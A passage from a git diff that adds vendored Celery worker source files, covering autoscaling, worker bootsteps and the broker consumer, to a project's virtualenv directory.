*args, **kwargs) + + def exit_after(self, secs, priority=10): + self.call_after(secs, sys.exit, priority) + + def cancel(self, tref): + tref.cancel() + + def clear(self): + self.schedule.clear() + + def empty(self): + return not len(self) + + def __len__(self): + return len(self.schedule) + + def __bool__(self): + """``bool(timer)``.""" + return True + __nonzero__ = __bool__ + + @property + def queue(self): + return self.schedule.queue diff --git a/env/Lib/site-packages/celery/worker/__init__.py b/env/Lib/site-packages/celery/worker/__init__.py new file mode 100644 index 00000000..51106807 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/__init__.py @@ -0,0 +1,4 @@ +"""Worker implementation.""" +from .worker import WorkController + +__all__ = ('WorkController',) diff --git a/env/Lib/site-packages/celery/worker/autoscale.py b/env/Lib/site-packages/celery/worker/autoscale.py new file mode 100644 index 00000000..e5b9024c --- /dev/null +++ b/env/Lib/site-packages/celery/worker/autoscale.py @@ -0,0 +1,154 @@ +"""Pool Autoscaling. + +This module implements the internal thread responsible +for growing and shrinking the pool according to the +current autoscale settings. + +The autoscale thread is only enabled if +the :option:`celery worker --autoscale` option is used. +""" +import os +import threading +from time import monotonic, sleep + +from kombu.asynchronous.semaphore import DummyLock + +from celery import bootsteps +from celery.utils.log import get_logger +from celery.utils.threads import bgThread + +from . import state +from .components import Pool + +__all__ = ('Autoscaler', 'WorkerComponent') + +logger = get_logger(__name__) +debug, info, error = logger.debug, logger.info, logger.error + +AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30)) + + +class WorkerComponent(bootsteps.StartStopStep): + """Bootstep that starts the autoscaler thread/timer in the worker.""" + + label = 'Autoscaler' + conditional = True + requires = (Pool,) + + def __init__(self, w, **kwargs): + self.enabled = w.autoscale + w.autoscaler = None + + def create(self, w): + scaler = w.autoscaler = self.instantiate( + w.autoscaler_cls, + w.pool, w.max_concurrency, w.min_concurrency, + worker=w, mutex=DummyLock() if w.use_eventloop else None, + ) + return scaler if not w.use_eventloop else None + + def register_with_event_loop(self, w, hub): + w.consumer.on_task_message.add(w.autoscaler.maybe_scale) + hub.call_repeatedly( + w.autoscaler.keepalive, w.autoscaler.maybe_scale, + ) + + def info(self, w): + """Return `Autoscaler` info.""" + return {'autoscaler': w.autoscaler.info()} + + +class Autoscaler(bgThread): + """Background thread to autoscale pool workers.""" + + def __init__(self, pool, max_concurrency, + min_concurrency=0, worker=None, + keepalive=AUTOSCALE_KEEPALIVE, mutex=None): + super().__init__() + self.pool = pool + self.mutex = mutex or threading.Lock() + self.max_concurrency = max_concurrency + self.min_concurrency = min_concurrency + self.keepalive = keepalive + self._last_scale_up = None + self.worker = worker + + assert self.keepalive, 'cannot scale down too fast.' + + def body(self): + with self.mutex: + self.maybe_scale() + sleep(1.0) + + def _maybe_scale(self, req=None): + procs = self.processes + cur = min(self.qty, self.max_concurrency) + if cur > procs: + self.scale_up(cur - procs) + return True + cur = max(self.qty, self.min_concurrency) + if cur < procs: + self.scale_down(procs - cur) + return True + + def maybe_scale(self, req=None): + if self._maybe_scale(req): + self.pool.maintain_pool() + + def update(self, max=None, min=None): + with self.mutex: + if max is not None: + if max < self.processes: + self._shrink(self.processes - max) + self._update_consumer_prefetch_count(max) + self.max_concurrency = max + if min is not None: + if min > self.processes: + self._grow(min - self.processes) + self.min_concurrency = min + return self.max_concurrency, self.min_concurrency + + def scale_up(self, n): + self._last_scale_up = monotonic() + return self._grow(n) + + def scale_down(self, n): + if self._last_scale_up and ( + monotonic() - self._last_scale_up > self.keepalive): + return self._shrink(n) + + def _grow(self, n): + info('Scaling up %s processes.', n) + self.pool.grow(n) + + def _shrink(self, n): + info('Scaling down %s processes.', n) + try: + self.pool.shrink(n) + except ValueError: + debug("Autoscaler won't scale down: all processes busy.") + except Exception as exc: + error('Autoscaler: scale_down: %r', exc, exc_info=True) + + def _update_consumer_prefetch_count(self, new_max): + diff = new_max - self.max_concurrency + if diff: + self.worker.consumer._update_prefetch_count( + diff + ) + + def info(self): + return { + 'max': self.max_concurrency, + 'min': self.min_concurrency, + 'current': self.processes, + 'qty': self.qty, + } + + @property + def qty(self): + return len(state.reserved_requests) + + @property + def processes(self): + return self.pool.num_processes diff --git a/env/Lib/site-packages/celery/worker/components.py b/env/Lib/site-packages/celery/worker/components.py new file mode 100644 index 00000000..f062affb --- /dev/null +++ b/env/Lib/site-packages/celery/worker/components.py @@ -0,0 +1,240 @@ +"""Worker-level Bootsteps.""" +import atexit +import warnings + +from kombu.asynchronous import Hub as _Hub +from kombu.asynchronous import get_event_loop, set_event_loop +from kombu.asynchronous.semaphore import DummyLock, LaxBoundedSemaphore +from kombu.asynchronous.timer import Timer as _Timer + +from celery import bootsteps +from celery._state import _set_task_join_will_block +from celery.exceptions import ImproperlyConfigured +from celery.platforms import IS_WINDOWS +from celery.utils.log import worker_logger as logger + +__all__ = ('Timer', 'Hub', 'Pool', 'Beat', 'StateDB', 'Consumer') + +GREEN_POOLS = {'eventlet', 'gevent'} + +ERR_B_GREEN = """\ +-B option doesn't work with eventlet/gevent pools: \ +use standalone beat instead.\ +""" + +W_POOL_SETTING = """ +The worker_pool setting shouldn't be used to select the eventlet/gevent +pools, instead you *must use the -P* argument so that patches are applied +as early as possible. +""" + + +class Timer(bootsteps.Step): + """Timer bootstep.""" + + def create(self, w): + if w.use_eventloop: + # does not use dedicated timer thread. + w.timer = _Timer(max_interval=10.0) + else: + if not w.timer_cls: + # Default Timer is set by the pool, as for example, the + # eventlet pool needs a custom timer implementation. + w.timer_cls = w.pool_cls.Timer + w.timer = self.instantiate(w.timer_cls, + max_interval=w.timer_precision, + on_error=self.on_timer_error, + on_tick=self.on_timer_tick) + + def on_timer_error(self, exc): + logger.error('Timer error: %r', exc, exc_info=True) + + def on_timer_tick(self, delay): + logger.debug('Timer wake-up! Next ETA %s secs.', delay) + + +class Hub(bootsteps.StartStopStep): + """Worker starts the event loop.""" + + requires = (Timer,) + + def __init__(self, w, **kwargs): + w.hub = None + super().__init__(w, **kwargs) + + def include_if(self, w): + return w.use_eventloop + + def create(self, w): + w.hub = get_event_loop() + if w.hub is None: + required_hub = getattr(w._conninfo, 'requires_hub', None) + w.hub = set_event_loop(( + required_hub if required_hub else _Hub)(w.timer)) + self._patch_thread_primitives(w) + return self + + def start(self, w): + pass + + def stop(self, w): + w.hub.close() + + def terminate(self, w): + w.hub.close() + + def _patch_thread_primitives(self, w): + # make clock use dummy lock + w.app.clock.mutex = DummyLock() + # multiprocessing's ApplyResult uses this lock. + try: + from billiard import pool + except ImportError: + pass + else: + pool.Lock = DummyLock + + +class Pool(bootsteps.StartStopStep): + """Bootstep managing the worker pool. + + Describes how to initialize the worker pool, and starts and stops + the pool during worker start-up/shutdown. + + Adds attributes: + + * autoscale + * pool + * max_concurrency + * min_concurrency + """ + + requires = (Hub,) + + def __init__(self, w, autoscale=None, **kwargs): + w.pool = None + w.max_concurrency = None + w.min_concurrency = w.concurrency + self.optimization = w.optimization + if isinstance(autoscale, str): + max_c, _, min_c = autoscale.partition(',') + autoscale = [int(max_c), min_c and int(min_c) or 0] + w.autoscale = autoscale + if w.autoscale: + w.max_concurrency, w.min_concurrency = w.autoscale + super().__init__(w, **kwargs) + + def close(self, w): + if w.pool: + w.pool.close() + + def terminate(self, w): + if w.pool: + w.pool.terminate() + + def create(self, w): + semaphore = None + max_restarts = None + if w.app.conf.worker_pool in GREEN_POOLS: # pragma: no cover + warnings.warn(UserWarning(W_POOL_SETTING)) + threaded = not w.use_eventloop or IS_WINDOWS + procs = w.min_concurrency + w.process_task = w._process_task + if not threaded: + semaphore = w.semaphore = LaxBoundedSemaphore(procs) + w._quick_acquire = w.semaphore.acquire + w._quick_release = w.semaphore.release + max_restarts = 100 + if w.pool_putlocks and w.pool_cls.uses_semaphore: + w.process_task = w._process_task_sem + allow_restart = w.pool_restarts + pool = w.pool = self.instantiate( + w.pool_cls, w.min_concurrency, + initargs=(w.app, w.hostname), + maxtasksperchild=w.max_tasks_per_child, + max_memory_per_child=w.max_memory_per_child, + timeout=w.time_limit, + soft_timeout=w.soft_time_limit, + putlocks=w.pool_putlocks and threaded, + lost_worker_timeout=w.worker_lost_wait, + threads=threaded, + max_restarts=max_restarts, + allow_restart=allow_restart, + forking_enable=True, + semaphore=semaphore, + sched_strategy=self.optimization, + app=w.app, + ) + _set_task_join_will_block(pool.task_join_will_block) + return pool + + def info(self, w): + return {'pool': w.pool.info if w.pool else 'N/A'} + + def register_with_event_loop(self, w, hub): + w.pool.register_with_event_loop(hub) + + +class Beat(bootsteps.StartStopStep): + """Step used to embed a beat process. + + Enabled when the ``beat`` argument is set. + """ + + label = 'Beat' + conditional = True + + def __init__(self, w, beat=False, **kwargs): + self.enabled = w.beat = beat + w.beat = None + super().__init__(w, beat=beat, **kwargs) + + def create(self, w): + from celery.beat import EmbeddedService + if w.pool_cls.__module__.endswith(('gevent', 'eventlet')): + raise ImproperlyConfigured(ERR_B_GREEN) + b = w.beat = EmbeddedService(w.app, + schedule_filename=w.schedule_filename, + scheduler_cls=w.scheduler) + return b + + +class StateDB(bootsteps.Step): + """Bootstep that sets up between-restart state database file.""" + + def __init__(self, w, **kwargs): + self.enabled = w.statedb + w._persistence = None + super().__init__(w, **kwargs) + + def create(self, w): + w._persistence = w.state.Persistent(w.state, w.statedb, w.app.clock) + atexit.register(w._persistence.save) + + +class Consumer(bootsteps.StartStopStep): + """Bootstep starting the Consumer blueprint.""" + + last = True + + def create(self, w): + if w.max_concurrency: + prefetch_count = max(w.max_concurrency, 1) * w.prefetch_multiplier + else: + prefetch_count = w.concurrency * w.prefetch_multiplier + c = w.consumer = self.instantiate( + w.consumer_cls, w.process_task, + hostname=w.hostname, + task_events=w.task_events, + init_callback=w.ready_callback, + initial_prefetch_count=prefetch_count, + pool=w.pool, + timer=w.timer, + app=w.app, + controller=w, + hub=w.hub, + worker_options=w.options, + disable_rate_limits=w.disable_rate_limits, + prefetch_multiplier=w.prefetch_multiplier, + ) + return c diff --git a/env/Lib/site-packages/celery/worker/consumer/__init__.py b/env/Lib/site-packages/celery/worker/consumer/__init__.py new file mode 100644 index 00000000..129801f7 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/__init__.py @@ -0,0 +1,15 @@ +"""Worker consumer.""" +from .agent import Agent +from .connection import Connection +from .consumer import Consumer +from .control import Control +from .events import Events +from .gossip import Gossip +from .heart import Heart +from .mingle import Mingle +from .tasks import Tasks + +__all__ = ( + 'Consumer', 'Agent', 'Connection', 'Control', + 'Events', 'Gossip', 'Heart', 'Mingle', 'Tasks', +) diff --git a/env/Lib/site-packages/celery/worker/consumer/agent.py b/env/Lib/site-packages/celery/worker/consumer/agent.py new file mode 100644 index 00000000..ca6d1209 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/agent.py @@ -0,0 +1,21 @@ +"""Celery + :pypi:`cell` integration.""" +from celery import bootsteps + +from .connection import Connection + +__all__ = ('Agent',) + + +class Agent(bootsteps.StartStopStep): + """Agent starts :pypi:`cell` actors.""" + + conditional = True + requires = (Connection,) + + def __init__(self, c, **kwargs): + self.agent_cls = self.enabled = c.app.conf.worker_agent + super().__init__(c, **kwargs) + + def create(self, c): + agent = c.agent = self.instantiate(self.agent_cls, c.connection) + return agent diff --git a/env/Lib/site-packages/celery/worker/consumer/connection.py b/env/Lib/site-packages/celery/worker/consumer/connection.py new file mode 100644 index 00000000..2992dc8c --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/connection.py @@ -0,0 +1,36 @@ +"""Consumer Broker Connection Bootstep.""" +from kombu.common import ignore_errors + +from celery import bootsteps +from celery.utils.log import get_logger + +__all__ = ('Connection',) + +logger = get_logger(__name__) +info = logger.info + + +class Connection(bootsteps.StartStopStep): + """Service managing the consumer broker connection.""" + + def __init__(self, c, **kwargs): + c.connection = None + super().__init__(c, **kwargs) + + def start(self, c): + c.connection = c.connect() + info('Connected to %s', c.connection.as_uri()) + + def shutdown(self, c): + # We must set self.connection to None here, so + # that the green pidbox thread exits. + connection, c.connection = c.connection, None + if connection: + ignore_errors(connection, connection.close) + + def info(self, c): + params = 'N/A' + if c.connection: + params = c.connection.info() + params.pop('password', None) # don't send password. + return {'broker': params} diff --git a/env/Lib/site-packages/celery/worker/consumer/consumer.py b/env/Lib/site-packages/celery/worker/consumer/consumer.py new file mode 100644 index 00000000..e072ef57 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/consumer.py @@ -0,0 +1,745 @@ +"""Worker Consumer Blueprint. + +This module contains the components responsible for consuming messages +from the broker, processing the messages and keeping the broker connections +up and running. +""" +import errno +import logging +import os +import warnings +from collections import defaultdict +from time import sleep + +from billiard.common import restart_state +from billiard.exceptions import RestartFreqExceeded +from kombu.asynchronous.semaphore import DummyLock +from kombu.exceptions import ContentDisallowed, DecodeError +from kombu.utils.compat import _detect_environment +from kombu.utils.encoding import safe_repr +from kombu.utils.limits import TokenBucket +from vine import ppartial, promise + +from celery import bootsteps, signals +from celery.app.trace import build_tracer +from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError, NotRegistered, WorkerShutdown, + WorkerTerminate) +from celery.utils.functional import noop +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.objects import Bunch +from celery.utils.text import truncate +from celery.utils.time import humanize_seconds, rate +from celery.worker import loops +from celery.worker.state import active_requests, maybe_shutdown, requests, reserved_requests, task_reserved + +__all__ = ('Consumer', 'Evloop', 'dump_body') + +CLOSE = bootsteps.CLOSE +TERMINATE = bootsteps.TERMINATE +STOP_CONDITIONS = {CLOSE, TERMINATE} +logger = get_logger(__name__) +debug, info, warn, error, crit = (logger.debug, logger.info, logger.warning, + logger.error, logger.critical) + +CONNECTION_RETRY = """\ +consumer: Connection to broker lost. \ +Trying to re-establish the connection...\ +""" + +CONNECTION_RETRY_STEP = """\ +Trying again {when}... ({retries}/{max_retries})\ +""" + +CONNECTION_ERROR = """\ +consumer: Cannot connect to %s: %s. +%s +""" + +CONNECTION_FAILOVER = """\ +Will retry using next failover.\ +""" + +UNKNOWN_FORMAT = """\ +Received and deleted unknown message. Wrong destination?!? + +The full contents of the message body was: %s +""" + +#: Error message for when an unregistered task is received. +UNKNOWN_TASK_ERROR = """\ +Received unregistered task of type %s. +The message has been ignored and discarded. + +Did you remember to import the module containing this task? +Or maybe you're using relative imports? + +Please see +https://docs.celeryq.dev/en/latest/internals/protocol.html +for more information. + +The full contents of the message body was: +%s + +The full contents of the message headers: +%s + +The delivery info for this task is: +%s +""" + +#: Error message for when an invalid task message is received. +INVALID_TASK_ERROR = """\ +Received invalid task message: %s +The message has been ignored and discarded. + +Please ensure your message conforms to the task +message protocol as described here: +https://docs.celeryq.dev/en/latest/internals/protocol.html + +The full contents of the message body was: +%s +""" + +MESSAGE_DECODE_ERROR = """\ +Can't decode message body: %r [type:%r encoding:%r headers:%s] + +body: %s +""" + +MESSAGE_REPORT = """\ +body: {0} +{{content_type:{1} content_encoding:{2} + delivery_info:{3} headers={4}}} +""" + +TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\ +Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it. +Terminating it instead. +""" + +CANCEL_TASKS_BY_DEFAULT = """ +In Celery 5.1 we introduced an optional breaking change which +on connection loss cancels all currently executed tasks with late acknowledgement enabled. +These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered +back to the queue. You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss +setting. In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0. +""" + + +def dump_body(m, body): + """Format message body for debugging purposes.""" + # v2 protocol does not deserialize body + body = m.body if body is None else body + return '{} ({}b)'.format(truncate(safe_repr(body), 1024), + len(m.body)) + + +class Consumer: + """Consumer blueprint.""" + + Strategies = dict + + #: Optional callback called the first time the worker + #: is ready to receive tasks. + init_callback = None + + #: The current worker pool instance. + pool = None + + #: A timer used for high-priority internal tasks, such + #: as sending heartbeats. + timer = None + + restart_count = -1 # first start is the same as a restart + + #: This flag will be turned off after the first failed + #: connection attempt. + first_connection_attempt = True + + class Blueprint(bootsteps.Blueprint): + """Consumer blueprint.""" + + name = 'Consumer' + default_steps = [ + 'celery.worker.consumer.connection:Connection', + 'celery.worker.consumer.mingle:Mingle', + 'celery.worker.consumer.events:Events', + 'celery.worker.consumer.gossip:Gossip', + 'celery.worker.consumer.heart:Heart', + 'celery.worker.consumer.control:Control', + 'celery.worker.consumer.tasks:Tasks', + 'celery.worker.consumer.consumer:Evloop', + 'celery.worker.consumer.agent:Agent', + ] + + def shutdown(self, parent): + self.send_all(parent, 'shutdown') + + def __init__(self, on_task_request, + init_callback=noop, hostname=None, + pool=None, app=None, + timer=None, controller=None, hub=None, amqheartbeat=None, + worker_options=None, disable_rate_limits=False, + initial_prefetch_count=2, prefetch_multiplier=1, **kwargs): + self.app = app + self.controller = controller + self.init_callback = init_callback + self.hostname = hostname or gethostname() + self.pid = os.getpid() + self.pool = pool + self.timer = timer + self.strategies = self.Strategies() + self.conninfo = self.app.connection_for_read() + self.connection_errors = self.conninfo.connection_errors + self.channel_errors = self.conninfo.channel_errors + self._restart_state = restart_state(maxR=5, maxT=1) + + self._does_info = logger.isEnabledFor(logging.INFO) + self._limit_order = 0 + self.on_task_request = on_task_request + self.on_task_message = set() + self.amqheartbeat_rate = self.app.conf.broker_heartbeat_checkrate + self.disable_rate_limits = disable_rate_limits + self.initial_prefetch_count = initial_prefetch_count + self.prefetch_multiplier = prefetch_multiplier + self._maximum_prefetch_restored = True + + # this contains a tokenbucket for each task type by name, used for + # rate limits, or None if rate limits are disabled for that task. + self.task_buckets = defaultdict(lambda: None) + self.reset_rate_limits() + + self.hub = hub + if self.hub or getattr(self.pool, 'is_green', False): + self.amqheartbeat = amqheartbeat + if self.amqheartbeat is None: + self.amqheartbeat = self.app.conf.broker_heartbeat + else: + self.amqheartbeat = 0 + + if not hasattr(self, 'loop'): + self.loop = loops.asynloop if hub else loops.synloop + + if _detect_environment() == 'gevent': + # there's a gevent bug that causes timeouts to not be reset, + # so if the connection timeout is exceeded once, it can NEVER + # connect again. + self.app.conf.broker_connection_timeout = None + + self._pending_operations = [] + + self.steps = [] + self.blueprint = self.Blueprint( + steps=self.app.steps['consumer'], + on_close=self.on_close, + ) + self.blueprint.apply(self, **dict(worker_options or {}, **kwargs)) + + def call_soon(self, p, *args, **kwargs): + p = ppartial(p, *args, **kwargs) + if self.hub: + return self.hub.call_soon(p) + self._pending_operations.append(p) + return p + + def perform_pending_operations(self): + if not self.hub: + while self._pending_operations: + try: + self._pending_operations.pop()() + except Exception as exc: # pylint: disable=broad-except + logger.exception('Pending callback raised: %r', exc) + + def bucket_for_task(self, type): + limit = rate(getattr(type, 'rate_limit', None)) + return TokenBucket(limit, capacity=1) if limit else None + + def reset_rate_limits(self): + self.task_buckets.update( + (n, self.bucket_for_task(t)) for n, t in self.app.tasks.items() + ) + + def _update_prefetch_count(self, index=0): + """Update prefetch count after pool/shrink grow operations. + + Index must be the change in number of processes as a positive + (increasing) or negative (decreasing) number. + + Note: + Currently pool grow operations will end up with an offset + of +1 if the initial size of the pool was 0 (e.g. + :option:`--autoscale=1,0 `). + """ + num_processes = self.pool.num_processes + if not self.initial_prefetch_count or not num_processes: + return # prefetch disabled + self.initial_prefetch_count = ( + self.pool.num_processes * self.prefetch_multiplier + ) + return self._update_qos_eventually(index) + + def _update_qos_eventually(self, index): + return (self.qos.decrement_eventually if index < 0 + else self.qos.increment_eventually)( + abs(index) * self.prefetch_multiplier) + + def _limit_move_to_pool(self, request): + task_reserved(request) + self.on_task_request(request) + + def _schedule_bucket_request(self, bucket): + while True: + try: + request, tokens = bucket.pop() + except IndexError: + # no request, break + break + + if bucket.can_consume(tokens): + self._limit_move_to_pool(request) + continue + else: + # requeue to head, keep the order. + bucket.contents.appendleft((request, tokens)) + + pri = self._limit_order = (self._limit_order + 1) % 10 + hold = bucket.expected_time(tokens) + self.timer.call_after( + hold, self._schedule_bucket_request, (bucket,), + priority=pri, + ) + # no tokens, break + break + + def _limit_task(self, request, bucket, tokens): + bucket.add((request, tokens)) + return self._schedule_bucket_request(bucket) + + def _limit_post_eta(self, request, bucket, tokens): + self.qos.decrement_eventually() + bucket.add((request, tokens)) + return self._schedule_bucket_request(bucket) + + def start(self): + blueprint = self.blueprint + while blueprint.state not in STOP_CONDITIONS: + maybe_shutdown() + if self.restart_count: + try: + self._restart_state.step() + except RestartFreqExceeded as exc: + crit('Frequent restarts detected: %r', exc, exc_info=1) + sleep(1) + self.restart_count += 1 + if self.app.conf.broker_channel_error_retry: + recoverable_errors = (self.connection_errors + self.channel_errors) + else: + recoverable_errors = self.connection_errors + try: + blueprint.start(self) + except recoverable_errors as exc: + # If we're not retrying connections, we need to properly shutdown or terminate + # the Celery main process instead of abruptly aborting the process without any cleanup. + is_connection_loss_on_startup = self.first_connection_attempt + self.first_connection_attempt = False + connection_retry_type = self._get_connection_retry_type(is_connection_loss_on_startup) + connection_retry = self.app.conf[connection_retry_type] + if not connection_retry: + crit( + f"Retrying to {'establish' if is_connection_loss_on_startup else 're-establish'} " + f"a connection to the message broker after a connection loss has " + f"been disabled (app.conf.{connection_retry_type}=False). Shutting down..." + ) + raise WorkerShutdown(1) from exc + if isinstance(exc, OSError) and exc.errno == errno.EMFILE: + crit("Too many open files. Aborting...") + raise WorkerTerminate(1) from exc + maybe_shutdown() + if blueprint.state not in STOP_CONDITIONS: + if self.connection: + self.on_connection_error_after_connected(exc) + else: + self.on_connection_error_before_connected(exc) + self.on_close() + blueprint.restart(self) + + def _get_connection_retry_type(self, is_connection_loss_on_startup): + return ('broker_connection_retry_on_startup' + if (is_connection_loss_on_startup + and self.app.conf.broker_connection_retry_on_startup is not None) + else 'broker_connection_retry') + + def on_connection_error_before_connected(self, exc): + error(CONNECTION_ERROR, self.conninfo.as_uri(), exc, + 'Trying to reconnect...') + + def on_connection_error_after_connected(self, exc): + warn(CONNECTION_RETRY, exc_info=True) + try: + self.connection.collect() + except Exception: # pylint: disable=broad-except + pass + + if self.app.conf.worker_cancel_long_running_tasks_on_connection_loss: + for request in tuple(active_requests): + if request.task.acks_late and not request.acknowledged: + warn(TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS, + request) + request.cancel(self.pool) + else: + warnings.warn(CANCEL_TASKS_BY_DEFAULT, CPendingDeprecationWarning) + + self.initial_prefetch_count = max( + self.prefetch_multiplier, + self.max_prefetch_count - len(tuple(active_requests)) * self.prefetch_multiplier + ) + + self._maximum_prefetch_restored = self.initial_prefetch_count == self.max_prefetch_count + if not self._maximum_prefetch_restored: + logger.info( + f"Temporarily reducing the prefetch count to {self.initial_prefetch_count} to avoid over-fetching " + f"since {len(tuple(active_requests))} tasks are currently being processed.\n" + f"The prefetch count will be gradually restored to {self.max_prefetch_count} as the tasks " + "complete processing." + ) + + def register_with_event_loop(self, hub): + self.blueprint.send_all( + self, 'register_with_event_loop', args=(hub,), + description='Hub.register', + ) + + def shutdown(self): + self.blueprint.shutdown(self) + + def stop(self): + self.blueprint.stop(self) + + def on_ready(self): + callback, self.init_callback = self.init_callback, None + if callback: + callback(self) + + def loop_args(self): + return (self, self.connection, self.task_consumer, + self.blueprint, self.hub, self.qos, self.amqheartbeat, + self.app.clock, self.amqheartbeat_rate) + + def on_decode_error(self, message, exc): + """Callback called if an error occurs while decoding a message. + + Simply logs the error and acknowledges the message so it + doesn't enter a loop. + + Arguments: + message (kombu.Message): The message received. + exc (Exception): The exception being handled. + """ + crit(MESSAGE_DECODE_ERROR, + exc, message.content_type, message.content_encoding, + safe_repr(message.headers), dump_body(message, message.body), + exc_info=1) + message.ack() + + def on_close(self): + # Clear internal queues to get rid of old messages. + # They can't be acked anyway, as a delivery tag is specific + # to the current channel. + if self.controller and self.controller.semaphore: + self.controller.semaphore.clear() + if self.timer: + self.timer.clear() + for bucket in self.task_buckets.values(): + if bucket: + bucket.clear_pending() + for request_id in reserved_requests: + if request_id in requests: + del requests[request_id] + reserved_requests.clear() + if self.pool and self.pool.flush: + self.pool.flush() + + def connect(self): + """Establish the broker connection used for consuming tasks. + + Retries establishing the connection if the + :setting:`broker_connection_retry` setting is enabled + """ + conn = self.connection_for_read(heartbeat=self.amqheartbeat) + if self.hub: + conn.transport.register_with_event_loop(conn.connection, self.hub) + return conn + + def connection_for_read(self, heartbeat=None): + return self.ensure_connected( + self.app.connection_for_read(heartbeat=heartbeat)) + + def connection_for_write(self, heartbeat=None): + return self.ensure_connected( + self.app.connection_for_write(heartbeat=heartbeat)) + + def ensure_connected(self, conn): + # Callback called for each retry while the connection + # can't be established. + def _error_handler(exc, interval, next_step=CONNECTION_RETRY_STEP): + if getattr(conn, 'alt', None) and interval == 0: + next_step = CONNECTION_FAILOVER + next_step = next_step.format( + when=humanize_seconds(interval, 'in', ' '), + retries=int(interval / 2), + max_retries=self.app.conf.broker_connection_max_retries) + error(CONNECTION_ERROR, conn.as_uri(), exc, next_step) + + # Remember that the connection is lazy, it won't establish + # until needed. + + # TODO: Rely only on broker_connection_retry_on_startup to determine whether connection retries are disabled. + # We will make the switch in Celery 6.0. + + retry_disabled = False + + if self.app.conf.broker_connection_retry_on_startup is None: + # If broker_connection_retry_on_startup is not set, revert to broker_connection_retry + # to determine whether connection retries are disabled. + retry_disabled = not self.app.conf.broker_connection_retry + + warnings.warn( + CPendingDeprecationWarning( + f"The broker_connection_retry configuration setting will no longer determine\n" + f"whether broker connection retries are made during startup in Celery 6.0 and above.\n" + f"If you wish to retain the existing behavior for retrying connections on startup,\n" + f"you should set broker_connection_retry_on_startup to {self.app.conf.broker_connection_retry}.") + ) + else: + if self.first_connection_attempt: + retry_disabled = not self.app.conf.broker_connection_retry_on_startup + else: + retry_disabled = not self.app.conf.broker_connection_retry + + if retry_disabled: + # Retry disabled, just call connect directly. + conn.connect() + self.first_connection_attempt = False + return conn + + conn = conn.ensure_connection( + _error_handler, self.app.conf.broker_connection_max_retries, + callback=maybe_shutdown, + ) + self.first_connection_attempt = False + return conn + + def _flush_events(self): + if self.event_dispatcher: + self.event_dispatcher.flush() + + def on_send_event_buffered(self): + if self.hub: + self.hub._ready.add(self._flush_events) + + def add_task_queue(self, queue, exchange=None, exchange_type=None, + routing_key=None, **options): + cset = self.task_consumer + queues = self.app.amqp.queues + # Must use in' here, as __missing__ will automatically + # create queues when :setting:`task_create_missing_queues` is enabled. + # (Issue #1079) + if queue in queues: + q = queues[queue] + else: + exchange = queue if exchange is None else exchange + exchange_type = ('direct' if exchange_type is None + else exchange_type) + q = queues.select_add(queue, + exchange=exchange, + exchange_type=exchange_type, + routing_key=routing_key, **options) + if not cset.consuming_from(queue): + cset.add_queue(q) + cset.consume() + info('Started consuming from %s', queue) + + def cancel_task_queue(self, queue): + info('Canceling queue %s', queue) + self.app.amqp.queues.deselect(queue) + self.task_consumer.cancel_by_queue(queue) + + def apply_eta_task(self, task): + """Method called by the timer to apply a task with an ETA/countdown.""" + task_reserved(task) + self.on_task_request(task) + self.qos.decrement_eventually() + + def _message_report(self, body, message): + return MESSAGE_REPORT.format(dump_body(message, body), + safe_repr(message.content_type), + safe_repr(message.content_encoding), + safe_repr(message.delivery_info), + safe_repr(message.headers)) + + def on_unknown_message(self, body, message): + warn(UNKNOWN_FORMAT, self._message_report(body, message)) + message.reject_log_error(logger, self.connection_errors) + signals.task_rejected.send(sender=self, message=message, exc=None) + + def on_unknown_task(self, body, message, exc): + error(UNKNOWN_TASK_ERROR, + exc, + dump_body(message, body), + message.headers, + message.delivery_info, + exc_info=True) + try: + id_, name = message.headers['id'], message.headers['task'] + root_id = message.headers.get('root_id') + except KeyError: # proto1 + payload = message.payload + id_, name = payload['id'], payload['task'] + root_id = None + request = Bunch( + name=name, chord=None, root_id=root_id, + correlation_id=message.properties.get('correlation_id'), + reply_to=message.properties.get('reply_to'), + errbacks=None, + ) + message.reject_log_error(logger, self.connection_errors) + self.app.backend.mark_as_failure( + id_, NotRegistered(name), request=request, + ) + if self.event_dispatcher: + self.event_dispatcher.send( + 'task-failed', uuid=id_, + exception=f'NotRegistered({name!r})', + ) + signals.task_unknown.send( + sender=self, message=message, exc=exc, name=name, id=id_, + ) + + def on_invalid_task(self, body, message, exc): + error(INVALID_TASK_ERROR, exc, dump_body(message, body), + exc_info=True) + message.reject_log_error(logger, self.connection_errors) + signals.task_rejected.send(sender=self, message=message, exc=exc) + + def update_strategies(self): + loader = self.app.loader + for name, task in self.app.tasks.items(): + self.strategies[name] = task.start_strategy(self.app, self) + task.__trace__ = build_tracer(name, task, loader, self.hostname, + app=self.app) + + def create_task_handler(self, promise=promise): + strategies = self.strategies + on_unknown_message = self.on_unknown_message + on_unknown_task = self.on_unknown_task + on_invalid_task = self.on_invalid_task + callbacks = self.on_task_message + call_soon = self.call_soon + + def on_task_received(message): + # payload will only be set for v1 protocol, since v2 + # will defer deserializing the message body to the pool. + payload = None + try: + type_ = message.headers['task'] # protocol v2 + except TypeError: + return on_unknown_message(None, message) + except KeyError: + try: + payload = message.decode() + except Exception as exc: # pylint: disable=broad-except + return self.on_decode_error(message, exc) + try: + type_, payload = payload['task'], payload # protocol v1 + except (TypeError, KeyError): + return on_unknown_message(payload, message) + try: + strategy = strategies[type_] + except KeyError as exc: + return on_unknown_task(None, message, exc) + else: + try: + ack_log_error_promise = promise( + call_soon, + (message.ack_log_error,), + on_error=self._restore_prefetch_count_after_connection_restart, + ) + reject_log_error_promise = promise( + call_soon, + (message.reject_log_error,), + on_error=self._restore_prefetch_count_after_connection_restart, + ) + + if ( + not self._maximum_prefetch_restored + and self.restart_count > 0 + and self._new_prefetch_count <= self.max_prefetch_count + ): + 